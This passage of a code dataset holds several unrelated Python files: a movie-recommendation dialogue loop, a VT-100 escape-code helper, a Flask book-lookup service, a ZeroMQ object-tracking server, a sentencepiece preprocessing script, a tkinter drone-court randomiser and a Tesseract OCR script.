pretrained strategy classifier to detect the strategy of generated responses\n if past_for_recommender == None:\n start = True\n else:\n start = False\n for cand in candidates_pool:\n if start:\n hist_response = tokenizer.decode(cand)\n hist_response_tmp = \"[CLS]\" + \"A:\" + hist_response+ \"[SEP]\"\n hist_response = RemoveStrategyAndSEP(hist_response_tmp)\n \n else:\n cand_tmp = tokenizer.decode(cand)\n cand_clean = RemoveStrategyAndSEP(cand_tmp)\n 
cand_clean = \"A:\"+cand_clean\n previous_user_tmp = RemoveStrategyAndSEP(previous_user)\n hist_response = \"[CLS]\" + previous_user_tmp + \"[SEP]\" + cand_clean + \"[SEP]\"\n hist_response = bert_tokenizer.encode(hist_response)\n # Attention: there is no padding\n b_input_mask = [int(i>=0) for i in hist_response]\n\n with torch.no_grad():\n strategy_logits = strategy_detector(torch.tensor(hist_response).unsqueeze(0).to(device), token_type_ids=None, attention_mask=torch.tensor(b_input_mask).unsqueeze(0).to(device))\n recommendation_logits = recommendation_detector(torch.tensor(hist_response).unsqueeze(0).to(device), token_type_ids=None, attention_mask=torch.tensor(b_input_mask).unsqueeze(0).to(device))\n value, index = strategy_logits.max(-1)\n _, recommendation_index = recommendation_logits.max(-1)\n\n candidates_strategy.append(label_to_strategy[index.item()])\n candidates_recommendation.append(label_to_recommendation[recommendation_index.item()])\n \n # remove candidate if there is ngram overlapping\n for index, sample in enumerate(candidates_pool):\n block = nGramBlock(sample, ngram)\n if block:\n if debug_print:\n print(\"There is a duplicated \", ngram, \" gram.\")\n candidates_pool.pop(index)\n candidates_past_pool.pop(index)\n candidates_strategy.pop(index)\n candidates_recommendation.pop(index)\n \n # Select one candidate from the candidates and reset the intermediate data container\n selected_idx = -1\n if selected_idx not in range(len(candidates_pool)): \n selected_idx = random.randint(0, len(candidates_pool) - 1)\n\n #-------------- sentence length rules-----------------\n '''\n max_len = 0\n selected_idx_new = -1\n for temp_idx, candidate_rec_utt in enumerate(candidates_pool):\n tokenized_cand_rec_len = len(candidate_rec_utt)\n decoded_candidate = tokenizer.decode(candidate_rec_utt)\n tokenized_generation = removeSEP(decoded_candidate).lower().split(\" \")\n \n if debug_print:\n print(\"Candidate recommender's utterance: \" + decoded_candidate)\n print(candidate_rec_utt)\n if \"what\" in tokenized_generation and (\"kind\" in tokenized_generation or \"type\" in tokenized_generation or \"kinds\" in tokenized_generation or \"types\" in tokenized_generation) and (\"movies\" in tokenized_generation) and \"like\" in tokenized_generation:\n if debug_print:\n print(\"Has been asked\")\n continue\n candidate_rec_utt_noSEP = tokenizer.encode(removeSEP(decoded_candidate))\n if tokenized_cand_rec_len > max_len and similarity(candidate_rec_utt_noSEP, last_rec_response) < 0.5:\n max_len = tokenized_cand_rec_len\n selected_idx_new = temp_idx\n if not start and turn_counter <= 7:\n selected_idx = selected_idx_new\n if debug_print:\n print(\"----\")\n '''\n #-------------- sentence length rules-----------------\n\n # setup past memory for recommender model and seeker model \n past = candidates_past_pool[selected_idx]\n sent = candidates_pool[selected_idx]\n recommendation_label = candidates_recommendation[selected_idx]\n turn_counter += 1\n if debug_print:\n print(\"Recommendation label: \" + str(recommendation_label))\n assert(len(candidates_past_pool) == len(candidates_pool) == len(candidates_strategy) == len(candidates_recommendation))\n\n generated_sent = tokenizer.decode(sent)\n generated_sent = remove_duplicate_movie_plots(generated_sent)\n\n #check type of question asked\n tokenized_generation = generated_sent.lower().split(\" \")\n if \"what\" in tokenized_generation and (\"kind\" in tokenized_generation or \"type\" in tokenized_generation or \"kinds\" in tokenized_generation or 
\"types\" in tokenized_generation) and (\"movies\" in tokenized_generation) and \"like\" in tokenized_generation:\n kind_of_movie_question=True\n \n proposed_genres = []\n\n if debug_print:\n print(\"Already recommended: \" + str(already_recommended.keys()))\n template_genre = \"action\"\n if last_mentioned_movie != \"\":\n if last_mentioned_movie in title_to_id and title_to_id[last_mentioned_movie] in valid_id:\n template_genre = valid_id[title_to_id[last_mentioned_movie]][\"genre\"].split(\", \")[0].lower()\n else:\n tokenized_title = last_mentioned_movie.split(\" \")\n if len(tokenized_title)>1:\n title = \"+\".join(tokenized_title[:len(tokenized_title)-1])\n else:\n title = last_mentioned_movie\n the_url = \"https://api.themoviedb.org/3/search/movie?api_key={}&query={}\".format(TMDB_KEY, title)\n movie_json = urlopen(the_url).read().decode('utf8')\n movie_info = json.loads(movie_json)\n results = movie_info['results']\n\n if len(results) > 0:\n tmdb_genre = results[0]['genre_ids'][0]\n template_genre = genre_from_tmdb[tmdb_genre]\n\n if debug_print:\n print(\"template genre: \" + str(template_genre))\n generated_sent, mentioned_genres, last_mentioned_genre = convert_back(generated_sent, mentioned_genres, proposed_genres, case=\"GENRE\", template_movie=None, template_genre=template_genre)\n \n if debug_print:\n print(\"mentioned genres: \" + str(mentioned_genres))\n if \"TITLE_\" in generated_sent:\n if positive_last_mentioned_genre == \"\":\n if \"[SEP]\" in generated_sent and \"genre: \" in generated_sent:\n temp = generated_sent.split(\"genre: \")\n temp2 = temp[len(temp)-1].split(\";\")\n positive_last_mentioned_genre = \"family\"\n if temp2[0].strip() != \"\":\n positive_last_mentioned_genre = temp2[0].strip()\n else:\n if mentioned_genres != {}:\n positive_last_mentioned_genre = last_mentioned_genre #mentioned_genres[len(mentioned_genres)-1]\n else:\n positive_last_mentioned_genre = \"comedy\"\n else:\n if mentioned_genres != {}:\n positive_last_mentioned_genre = last_mentioned_genre #mentioned_genres[len(mentioned_genres)-1]\n else:\n positive_last_mentioned_genre = \"comedy\"\n if debug_print:\n print(\"Positive last mentioned genre: \" + str(positive_last_mentioned_genre))\n\n recommendations, already_recommended = give_recommendation(favorite, positive_last_mentioned_genre, positive_actor, last_mentioned_attribute, already_recommended)\n if debug_print:\n print(\"recommendations: \" + str(recommendations))\n if recommendation_label == \"not_recommendation\":\n generated_sent, movie_mentioned, last_mentioned_movie = convert_back(generated_sent, movie_mentioned, recommendations, case=\"TITLE\",template_movie=\"Joker (2019)\")\n else:\n if debug_print:\n print(\"here is force rec: \" + str(recommendation_label))\n template_rec = \"Joker (2019)\"\n \n if recommendations != []:\n \n for the_recommended_movie in recommendations:\n if the_recommended_movie not in already_recommended:\n template_rec = the_recommended_movie\n break\n generated_sent, movie_mentioned, last_mentioned_movie = force_rec(generated_sent, movie_mentioned, recommendations, template_movie=template_rec)\n if last_mentioned_movie not in already_recommended:\n already_recommended[last_mentioned_movie] = True\n if debug_print:\n print(\"Last mentioned movie debugging: \" + last_mentioned_movie)\n generated_sent = get_movie_plot(generated_sent, last_mentioned_movie)\n\n generated_sent, mentioned_actors = replace_actors(generated_sent, last_mentioned_movie, mentioned_actors, last_mentioned_actors, turn_counter)\n\n if 
debug_print:\n print(\"Last mentioned movie attribute: \" + last_mentioned_attribute) \n print(\"RECOMMENDER: \" + generated_sent)\n \n last_rec_response = tokenizer.encode(generated_sent)\n \n # finish tail\n prev_input = torch.LongTensor(sep).unsqueeze(0).to(device)\n _, past = model_A(prev_input, past=past)\n \n # input and update B's utterance\n user = input(\"SEEKER: \")\n if user == \"quit\":\n break\n \n sentiment_label = get_sentiment(user.lower())\n if debug_print:\n print(\"Sentiment label: \" + sentiment_label)\n text_with_placeholder, movie_in_text, movie_mentioned = create_movie_slot(generated_sent, user, movie_mentioned)\n if debug_print:\n print(\"movie_mentioned: \" + str(movie_mentioned))\n user_with_genre, mentioned_genre_dict, genre_list = label_genre(text_with_placeholder, mentioned_genres)\n user_utt = user_with_genre\n \n if movie_in_text != \"\":\n user_utt = add_SEP(user_with_genre, movie_in_text.split(\"; \"), case=\"movie\")\n last_mentioned_attribute = \"movie\"\n if sentiment_label != \"negative\":\n favorite[\"movies\"] += movie_in_text.split(\"; \")\n \n last_mentioned_movie = favorite[\"movies\"][len(favorite[\"movies\"])-1]\n if debug_print:\n print(favorite)\n \n if genre_list != []:\n user_utt = add_SEP(user_utt, genre_list)\n if sentiment_label != \"negative\":\n favorite[\"genres\"] += genre_list\n if debug_print:\n print(favorite)\n positive_last_mentioned_genre = genre_list[len(genre_list)-1]\n last_mentioned_attribute = \"genre\"\n \n\n user_utt, people_names, mentioned_actors, mentioned_people, mentioned_directors = find_name(user_utt, name_list, mentioned_actors, mentioned_directors, {})\n if debug_print:\n print(\"user utt: \" + str(user_utt))\n if people_names != []:\n user_utt = add_SEP(user_utt, people_names, case=\"people_name\")\n last_mentioned_attribute = \"actor\"\n last_mentioned_actors = [people_names, turn_counter]\n if sentiment_label != \"negative\":\n positive_actor = people_names[len(people_names)-1]\n \n if debug_print:\n print(last_mentioned_attribute)\n print(\"processed: \" + user_utt + \" last REC: \" + generated_sent)\n \n previous_user = \"B:\" + user_utt\n # print(\"The input of user model: \", previous_user)\n\n user = tokenizer.encode(\"B:\" + user_utt)\n prev_input = user + sep\n prev_input = torch.LongTensor(prev_input).unsqueeze(0).to(device)\n \n # seeker \n _, past = model_B(prev_input, past=past)\n \n # start A's utterance\n suffix = tokenizer.encode(\"A: \")\n prev_input = torch.LongTensor(suffix).unsqueeze(0).to(device)\n \n # recode the prev_input and past for recommender\n past_for_recommender = past\n prev_input_for_recommender = prev_input\n\n\n","sub_path":"code/interactive.py","file_name":"interactive.py","file_ext":"py","file_size_in_byte":69901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"91918061","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\n TODO Purpose of the file\n @project: HSPyLib\n hspylib.main.hspylib.modules.cli.vt100\n @file: vt_codes.py\n @created: Tue, 4 May 2021\n @author: Hugo Saporetti Junior\"\n @site: https://github.com/yorevs/hspylib\n @license: MIT - Please refer to \n\n Copyright 2021, HSPyLib team\n\"\"\"\n\nimport re\nfrom enum import auto\n\nfrom hspylib.core.enums.enumeration import Enumeration\nfrom hspylib.modules.cli.vt100.vt_100 import Vt100\n\n\ndef vt_print(vt100_str: str, end: str = '') -> None:\n \"\"\"Print a vt-100 encoded string. 
VT-100 string will contain one or more %VT-100-CODE% \"\"\"\n print(VtCodes.decode(vt100_str), end=end)\n\n\nclass VtCodes(Enumeration):\n \"\"\"VT-100 escape codes\"\"\"\n\n # @formatter:off\n CSV = Vt100.save_cursor() # ^[7 -> Save cursor position and attributes\n CRE = Vt100.restore_cursor() # ^[8 -> Restore cursor position and attributes\n RIS = Vt100.reset() # ^[c -> Reset terminal to initial state\n\n SAW = Vt100.set_auto_wrap(True) # ^[?7h -> Set auto-wrap mode\n UAW = Vt100.set_auto_wrap(False) # ^[?7l -> Unset auto-wrap mode\n SSC = Vt100.set_show_cursor(True) # ^[?25h -> Set show cursor\n USC = Vt100.set_show_cursor(False) # ^[?25l -> Unset show cursor\n\n ED0 = Vt100.clear_screen() # ^[[J -> Clear screen from cursor down\n ED1 = Vt100.clear_screen(1) # ^[[1J -> Clear screen from cursor up\n ED2 = Vt100.clear_screen(2) # ^[[2J -> Clear entire screen\n\n EL0 = Vt100.clear_line() # ^[[K -> Clear line from cursor right\n EL1 = Vt100.clear_line(1) # ^[[1K -> Clear line from cursor left\n EL2 = Vt100.clear_line(2) # ^[[2K -> Clear entire line\n\n HOM = Vt100.cursor_pos() # ^[[H -> Move cursor to upper left corner\n\n # The following entries must defined as auto(), so they can be invoked as Callable\n\n MOD = auto() # ^[[m -> Set terminal modes\n CUP = auto() # ^[[;H -> Move cursor to screen location \n CUU = auto() # ^[[A -> Move cursor up n lines\n CUD = auto() # ^[[B -> Move cursor down n lines\n CUF = auto() # ^[[C -> Move cursor right n lines\n CUB = auto() # ^[[D -> Move cursor left n lines\n # @formatter:on\n\n # For all mnemonics that take arguments we need to include in this map, so we can call it\n __VT100_FNC_MAP__ = {\n \"MOD\": Vt100.mode,\n \"CUP\": Vt100.cursor_pos,\n \"CUU\": Vt100.cursor_move_up,\n \"CUD\": Vt100.cursor_move_down,\n \"CUF\": Vt100.cursor_move_forward,\n \"CUB\": Vt100.cursor_move_backward,\n }\n\n @classmethod\n def decode(cls, input_string: str) -> str:\n \"\"\"Decode the string into a VT_CODE enum\"\"\"\n results = re.findall(r'%([a-zA-Z0-9]+)(\\([0-9]+(;[0-9]+)*\\))?%', input_string)\n for nextResult in results:\n mnemonic = nextResult[0]\n if mnemonic in VtCodes.names():\n args = nextResult[1][1:-1] if nextResult[1] else ''\n if args:\n input_string = input_string.replace(\n '%{}%'.format(mnemonic + nextResult[1]), VtCodes.value_of(mnemonic)(args))\n else:\n input_string = input_string.replace(\n '%{}%'.format(mnemonic), VtCodes.value_of(mnemonic).value)\n\n return input_string\n\n def __call__(self, *args, **kwargs) -> str:\n return VtCodes.__VT100_FNC_MAP__[self.name](args[0])\n\n def __str__(self) -> str:\n return str(self.value)\n\n def code(self) -> str:\n \"\"\"Decode the string into a VT_CODE enum\"\"\"\n return str(self)\n\n def placeholder(self) -> str:\n \"\"\"Decode the string into a VT_CODE enum\"\"\"\n return f\"%{self.name}%\"\n","sub_path":"src/main/hspylib/modules/cli/vt100/vt_codes.py","file_name":"vt_codes.py","file_ext":"py","file_size_in_byte":4046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"275021582","text":"from flask import Flask, make_response, jsonify, request\nfrom flask_restful import Api, Resource, reqparse\nfrom service import Library\nfrom model import Book\n\napp = Flask(__name__)\napi = Api(app)\nlibrary = Library()\n\n@app.route(\"/library/book/\", methods=['GET'])\ndef find(isbn):\n try:\n book = library.find(isbn)\n response = make_response(jsonify({\n \"isbn\": book.isbn,\n \"title\": book.title,\n \"price\": book.price\n }))\n 
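# CORS header is set by hand on each response; flask-cors (CORS(app))\n        # would be the usual way to apply the same header globally\n        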
response.headers.add('Access-Control-Allow-Origin', '*')\n        return response\n    except Exception as e:\n        response = make_response(str(e), 404)\n        response.headers.add('Access-Control-Allow-Origin', '*')\n        return response\n\napp.run(host='0.0.0.0', port=5000, debug=True)\n","sub_path":"library-dockers/library-find-service/app/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"26143010","text":"\nimport time\nimport zmq\nimport cv2\nimport base64\nimport numpy as np\nfrom object_tracker import ObjectTracker\n\nfrom absl import app, flags, logging\nfrom absl.flags import FLAGS\n\n\n\nflags.DEFINE_string('classes', './data/labels/coco.names', 'path to classes file')\nflags.DEFINE_string('weights', './weights/yolov3.tf',\n                    'path to weights file')\nflags.DEFINE_boolean('tiny', False, 'yolov3 or yolov3-tiny')\nflags.DEFINE_integer('size', 416, 'resize images to')\nflags.DEFINE_string('video', './data/video/test.mp4',\n                    'path to video file or number for webcam')\nflags.DEFINE_string('output', None, 'path to output video')\nflags.DEFINE_string('output_format', 'XVID', 'codec used in VideoWriter when saving video to file')\nflags.DEFINE_integer('num_classes', 80, 'number of classes in the model')\n\n\ncontext = zmq.Context()\nfootage_socket = context.socket(zmq.SUB)\nfootage_socket.bind('tcp://*:5555')\nfootage_socket.setsockopt_string(zmq.SUBSCRIBE, str(''))\n\nsocket = context.socket(zmq.REP)\nsocket.bind('tcp://*:5556')\n\ndef send_array(socket, A, flags=0, copy=True, track=False):\n    md = dict(\n        dtype = str(A.dtype),\n        shape = A.shape,\n    )\n    socket.send_json(md, flags|zmq.SNDMORE)\n    return socket.send(A, flags, copy=copy, track=track)\n\n\ndef main(_argv):\n\n    object_tracker = ObjectTracker()\n    frame = None \n\n    while True:\n\t \n        frame = footage_socket.recv_string()\n        img = base64.b64decode(frame)\n        # np.fromstring is deprecated for binary input; np.frombuffer is the drop-in replacement\n        npimg = np.frombuffer(img, dtype=np.uint8)\n        source = cv2.imdecode(npimg, 1)\n        \n        message = socket.recv() \n\n        object_tracker.run(source)\n        \n        send_array(socket, np.array(object_tracker.get_last_tracked()))\n\n        object_tracker.clear_last_tracked()\n    \n\nif __name__ == '__main__':\n    try:\n        app.run(main)\n\n    except SystemExit:\n        pass\n\n\n\n\n\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"133104243","text":"# -*- coding: utf-8 -*-\n#!/usr/bin/python3\n'''\nFeb. 2019 by kyubyong park.\nkbpark.linguist@gmail.com.\nhttps://www.github.com/kyubyong/transformer.\n\nPreprocess the iwslt 2016 datasets.\n'''\n\n# Full corpus location: /data/234/UM-Corpus/data/Bilingual/allTex.txt\n\n\nimport os\nimport errno\nimport sentencepiece as spm\nimport re\n\nimport logging\n\nlogging.basicConfig(level=logging.CRITICAL)\n\nif 0:\n    \"\"\"Load raw data -> Preprocessing -> Segmenting with sentencepiece\n    hp: hyperparams. 
argparse.\n    \"\"\"\n    print('start')\n    if not os.path.exists('中英文bpe模型'):\n        os.mkdir('中英文bpe模型')\n    logging.info(\"# Train a joint BPE model with sentencepiece\")\n    # For the train args, it is enough to set the unk id, bos id, and eos id.\n    train = '--input=/data/234/UM-Corpus/data/Bilingual/Bi-Education.txt --pad_id=0 --unk_id=1 \\\n    --bos_id=2 --eos_id=3\\\n    --model_prefix=中英文bpe模型/bpe --vocab_size={} \\\n    --model_type=bpe '.format(32000)\n    spm.SentencePieceTrainer.Train(train)\n    print('Training finished!')\n    logging.info(\"# Load trained bpe model\")\n    sp = spm.SentencePieceProcessor()\n    sp.Load(\"中英文bpe模型/bpe.model\")\n    print(sp.EncodeAsPieces('dsjafljdsl,我是一个人'))\n\nif 0:\n    sp = spm.SentencePieceProcessor()\n    sp.Load(\"中英文bpe模型/bpe.model\")\n    print(sp.EncodeAsPieces('dsjafljdsl,我是一个人客结合线上线下大数据,线上通过运营商强大的数据挖掘能力,多方位精准锁定用户。线下通过场景大数据,依托智能硬件与大数据,汇集海量移动媒体和终端资源,为企业提供移动互联网精准营销与大数据应用服务'))\n    _prepro = lambda x: [line.strip() for line in open(x, 'r').read().split(\"\\n\") ]\n    prepro_train1 = _prepro('/data/234/UM-Corpus/data/Bilingual/Bi-Education.txt')\n\n    def _segment_and_write(sents, fname):\n        with open(fname, \"w\") as fout:\n            for sent in sents:\n                pieces = sp.EncodeAsPieces(sent)\n                fout.write(\" \".join(pieces) + \"\\n\")\n    _segment_and_write(prepro_train1, \"chineseEnglishData.bpe\")\n    ## This file chineseEnglishData.bpe is the training set.\n\n    # Then just split batches by odd/even lines for training, and encode with the .vocab file in the same directory.\n\n\n    # The resulting subword pieces can then be looked up in the corresponding vocab.\n\nif 1:\n    # Turn 中英文bpe模型/bpe.vocab into a dictionary\n    from collections import defaultdict\n    dicA=defaultdict(int)\n    with open('中英文bpe模型/bpe.vocab') as t:\n        tmp= t.readlines()\n        for i in range(len(tmp)):\n\n            a=tmp[i].strip('\\n').split('\\t')\n            dicA[a[0]]=a[1]\n    print(dicA)\n\n    sp = spm.SentencePieceProcessor()\n    sp.Load(\"中英文bpe模型/bpe.model\")\n    print(sp.EncodeAsPieces('dsjafljdsl,我是一个人客结合线上线下大数据,线上通过运营商强大的数据挖掘能力,多方位精准锁定用户。线下通过场景大数据,依托智能硬件与大数据,汇集海量移动媒体和终端资源,为企业提供移动互联网精准营销与大数据应用服务'))\n    _prepro = lambda x: [line.strip() for line in open(x, 'r').read().split(\"\\n\")]\n    prepro_train1 = _prepro('/data/234/UM-Corpus/data/Bilingual/Bi-Education.txt')\n\n\n    def _segment_and_write(sents, fname):\n        with open(fname, \"w\") as fout:\n            for sent in sents:\n                pieces = sp.EncodeAsPieces(sent)\n                pieces=[str(dicA[i]) for i in pieces]\n                fout.write(\" \".join(pieces) + \"\\n\")\n\n\n    _segment_and_write(prepro_train1, \"chineseEnglishDataCoded.bpe\")\n# Done; from now on, train on this encoded file chineseEnglishDataCoded.bpe.","sub_path":"prepro生成字典的代码2.py","file_name":"prepro生成字典的代码2.py","file_ext":"py","file_size_in_byte":3695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"486393792","text":"\n\nimport random as rd\nimport tkinter as tk\nimport threading\nimport time\nfrom PIL import ImageGrab # do pip3 install pillow\nfrom PIL import Image\n\nHEIGHT = 768\nWIDTH = 360\n\nclass RandomCourt:\n    def __init__(self):\n        self.choice = [0, 1, 2, 3, 4]\n        self.parking_or_hoop = [] # ['parking', 'hoop', ...]\n        self.pos_to_put = [] # [1, 0, 3, 4, ...] 
max 4, min 0\n        self.pos_with_tree = []\n        self.tree_with_code = []\n\n\n    def random(self):\n        self._set_parking_or_hoop()\n        self._set_pos_to_put()\n        self._set_tree_pos()\n\n    def _set_parking_or_hoop(self):\n        line_all = ['parking', 'parking', 'parking']\n        line_3_8 = ['hoop', 'hoop', 'hoop', 'parking', 'parking', 'parking']\n        rd.shuffle(line_3_8)\n        [line_all.insert(2, x) for x in line_3_8]\n        self.parking_or_hoop = line_all\n\n    def _set_pos_to_put(self):\n        self.pos_to_put.clear()\n        for _ in range(9):\n            self.pos_to_put.append(rd.choice(self.choice))\n\n    def _set_tree_pos(self):\n        tree = []\n        for i in range(12):\n            tree.append(i)\n        rd.shuffle(tree)\n        self.pos_with_tree = tree[:10]\n        self.tree_with_code = tree[:5]\n\n    def ran_print(self):\n        self.random()\n        print(self.parking_or_hoop)\n        print(self.pos_to_put)\n        print(self.pos_with_tree)\n        print(self.tree_with_code)\n\nclass Window:\n    def __init__(self):\n        #random thing\n        self.randomcourt = RandomCourt()\n        self.randomflag = False\n        self.randomfreq = 0.1\n\n        #GUI\n        self.root = tk.Tk()\n        self.root.title('Drone Court')\n        self.root.geometry(\"600x800+300+20\") # on Mac x is 117 + ~ y is 25 + ~\n\n\n        self.frame = tk.Frame(self.root, width=WIDTH)\n        self.canvas = tk.Canvas(self.root, width=WIDTH, height=HEIGHT, background='grey')\n        self.randombutton = tk.Button(self.frame, text='Start Random', command=self.startrandom)\n        self.stopbutton = tk.Button(self.frame, text='Stop Random', command=self.stoprandom)\n        self.confirmbutton = tk.Button(self.frame, text='Confirm Court', command=self.confirmcourt)\n\n        #draw\n        self.coef = WIDTH / 15 # hard code, 450->width\n        self.tree_pos = [] # tree coordinate\n        self._get_12tree_coor()\n\n        #layout and fixed\n        self._set_layout()\n        self._draw_court_fixed()\n\n        #screenshot save and read\n        self.url = '/Users/yuhu/Desktop/01.png'\n\n    def startrandom(self):\n        self.randombutton['state'] = tk.DISABLED\n        self.stopbutton['state'] = tk.NORMAL\n        self.randomflag = True\n\n        self.t1 = threading.Thread(target=self._startrandom)\n        self.t1.setDaemon(True)\n        self.t1.start()\n\n    def stoprandom(self):\n\n        self.stopbutton['state'] = tk.DISABLED\n        self.randombutton['state'] = tk.NORMAL\n        self.randomflag = False\n\n    def confirmcourt(self):\n        self.confirmbutton['state'] = tk.DISABLED\n        if self.getter():\n            img = Image.open(self.url)\n            img.show()\n\n\n    def _set_layout(self):\n        self.frame.pack(side=tk.BOTTOM)\n        self.randombutton.pack(side=tk.LEFT, expand=tk.NO, anchor=tk.S)\n        self.confirmbutton.pack(side=tk.RIGHT, expand=tk.NO, anchor=tk.S)\n        self.stopbutton.pack(side=tk.RIGHT, expand=tk.NO, anchor=tk.S)\n        self.canvas.pack(side=tk.TOP)\n\n\n\n    def _startrandom(self):\n        while(self.randomflag):\n            time.sleep(self.randomfreq)\n            self.randomcourt.random()\n            self.canvas.delete('delete')\n            self._canvas_update()\n\n    def _canvas_update(self):\n\n        #draw top court\n        for i in self.randomcourt.pos_with_tree[5:]:\n            self._draw_tree_base_on_pos(i, color='red')\n        for j in self.randomcourt.tree_with_code:\n            self._draw_tree_base_on_pos(j, color='pink')\n\n        self._draw_sequence_base_on_pos()\n\n\n    def _draw_court_fixed(self):\n        self.canvas.create_rectangle(0, 0, 1.2 * self.coef, 1.2 * self.coef, fill='yellow')\n        self.canvas.create_text(0.6 * self.coef, 0.6 * self.coef, text='H')\n        self.canvas.create_rectangle(WIDTH - 1.2 * self.coef, 0, WIDTH, 1.2 * self.coef, fill='yellow')\n        self.canvas.create_text(WIDTH - 0.6 * self.coef, 0.6 * self.coef, text='H')\n        self.canvas.create_line(0, 0.375 * HEIGHT - 3, WIDTH, 0.375 * HEIGHT - 3, fill='blue', width=3)\n        self.canvas.create_rectangle(WIDTH / 2 - 0.6 * 
self.coef, HEIGHT, WIDTH / 2 + 0.6 * self.coef,\n HEIGHT - 1.2 * self.coef, fill='yellow')\n self.canvas.create_text(WIDTH / 2, HEIGHT - 0.6 * self.coef, text='0')\n\n for i in range(9):\n self.canvas.create_line(0, (0.0625 * (9 - i) + 0.375) * HEIGHT, WIDTH,\n (0.0625 * (9 - i) + 0.375) * HEIGHT, dash=(2, 2))\n\n for i in range(5):\n self.canvas.create_line((i + 1) * WIDTH * 0.2, 0.375 * HEIGHT, (i + 1) * WIDTH * 0.2, HEIGHT, dash=(2, 2))\n\n def _draw_sequence_base_on_pos(self):\n\n def get_outer_rec(num_y, pos_x): # num_y 1-9 pos_x 0-4\n left_top_x = pos_x * WIDTH * 0.2\n left_top_y = (0.0625 * (9 - num_y) + 0.375) * HEIGHT\n right_bot_x = left_top_x + 0.2 * WIDTH\n right_bot_y = left_top_y + 0.0625 * HEIGHT\n return left_top_x, left_top_y, right_bot_x, right_bot_y\n\n def get_inner_drawing_square(x1, y1, x2, y2):\n rec_size = (y2 - y1) * 0.80\n left_top_x = x1 + ((x2 - x1) - rec_size) / 2\n left_top_y = y1 * 0.9 + y2 * 0.1\n return (left_top_x, left_top_y, left_top_x + rec_size, left_top_y + rec_size), rec_size\n\n\n for i in range(9): # 9 rows i = 0~8\n x_1, y_1, x_2, y_2 = get_outer_rec(i + 1, self.randomcourt.pos_to_put[i])\n drawing_square, inner_size = get_inner_drawing_square(x_1, y_1, x_2, y_2)\n if self.randomcourt.parking_or_hoop[i] == 'parking':\n self.canvas.create_rectangle(drawing_square, fill='yellow', tags=('delete'))\n else:\n self.canvas.create_oval(drawing_square, tags=('delete'))\n self.canvas.create_text(drawing_square[0] + inner_size / 2,\n drawing_square[1] + inner_size / 2, text=str(i+1), tags=('delete'))\n\n def _draw_tree_base_on_pos(self, pos, color='pink'):\n self.canvas.create_oval(self.tree_pos[pos], fill=color, dash=(4, 4), tags=('delete'))\n tree_rectangle = (self.tree_pos[pos][0] + self.coef * 0.75, self.tree_pos[pos][1],\n self.tree_pos[pos][0] + self.coef * 1.25, self.tree_pos[pos][1] - self.coef / 2)\n self.canvas.create_rectangle(tree_rectangle, fill=color, tags=('delete'))\n\n def _get_12tree_coor(self):\n\n def get_one_tree_coor(x_left, y_top):\n rad = 1 * self.coef\n return x_left * self.coef, y_top * self.coef, x_left * self.coef + 2 * rad, y_top * self.coef + 2 * rad\n\n tree_0 = get_one_tree_coor(2.5, 1.5)\n self.tree_pos.append(tree_0)\n tree_1 = get_one_tree_coor(5, 1.5)\n self.tree_pos.append(tree_1)\n tree_2 = get_one_tree_coor(8.5, 1.5)\n self.tree_pos.append(tree_2)\n tree_3 = get_one_tree_coor(11.5, 1.5)\n self.tree_pos.append(tree_3)\n\n tree_4 = get_one_tree_coor(1.5, 5) # ??\n self.tree_pos.append(tree_4)\n tree_5 = get_one_tree_coor(5, 5)\n self.tree_pos.append(tree_5)\n tree_6 = get_one_tree_coor(8.5, 5)\n self.tree_pos.append(tree_6)\n tree_7 = get_one_tree_coor(12, 5)\n self.tree_pos.append(tree_7)\n\n tree_8 = get_one_tree_coor(1.5, 8.5)\n self.tree_pos.append(tree_8)\n tree_9 = get_one_tree_coor(5, 8.5)\n self.tree_pos.append(tree_9)\n tree_10 = get_one_tree_coor(8.5, 8.5)\n self.tree_pos.append(tree_10)\n tree_11 = get_one_tree_coor(12, 8.5)\n self.tree_pos.append(tree_11)\n\n def getter(self):\n x = (self.root.winfo_rootx() + self.canvas.winfo_x()) * 2\n y = self.root.winfo_rooty() + self.canvas.winfo_y()\n x1 = x+WIDTH * 2\n y1 = y * 2 + HEIGHT * 2\n print('x is {}'.format(x))\n print('y is {}'.format(y))\n print('x1 is {}'.format(x1))\n print('y1 is {}'.format(y1))\n ImageGrab.grab((x, y, x1, y1)).save(self.url)\n return 1\n\n\n\nif __name__ == '__main__':\n\n a = RandomCourt()\n for _ in range(5):\n a.ran_print()\n\n\n a = Window()\n 
a.root.mainloop()\n\n\n","sub_path":"drone_court.py","file_name":"drone_court.py","file_ext":"py","file_size_in_byte":8565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"}
+{"seq_id":"400752175","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport pytesseract\nimport os\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport cv2\nfrom PIL import Image\nfrom difflib import SequenceMatcher\nimport sys\n\n\ndef main():\n \n im = Image.open(\"CV/img/questionImage.png\")\n \n img=cv2.imread(\"CV/img/questionImage.png\")\n cv2.imshow(\"Question\",img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n #print(\"Recognizing text...\\n\")\n texto = pytesseract.image_to_string(im)\n \n #print(texto)\n \n problema=\"\"\n for i in range(len(texto)):\n if texto[i]=='a' and i+1 < len(texto) and texto[i+1]==')':\n break\n else:\n if texto[i]=='\\n':\n problema+=\" \"\n else:\n problema+=texto[i] \n\n \n f = open(\"outputs/problem.txt\", \"w\")\n f.write(problema)\n f.close()\n \nif __name__ == '__main__':\n\tmain()\n \n\n\n","sub_path":"CV/OCR/basicOCR.py","file_name":"basicOCR.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
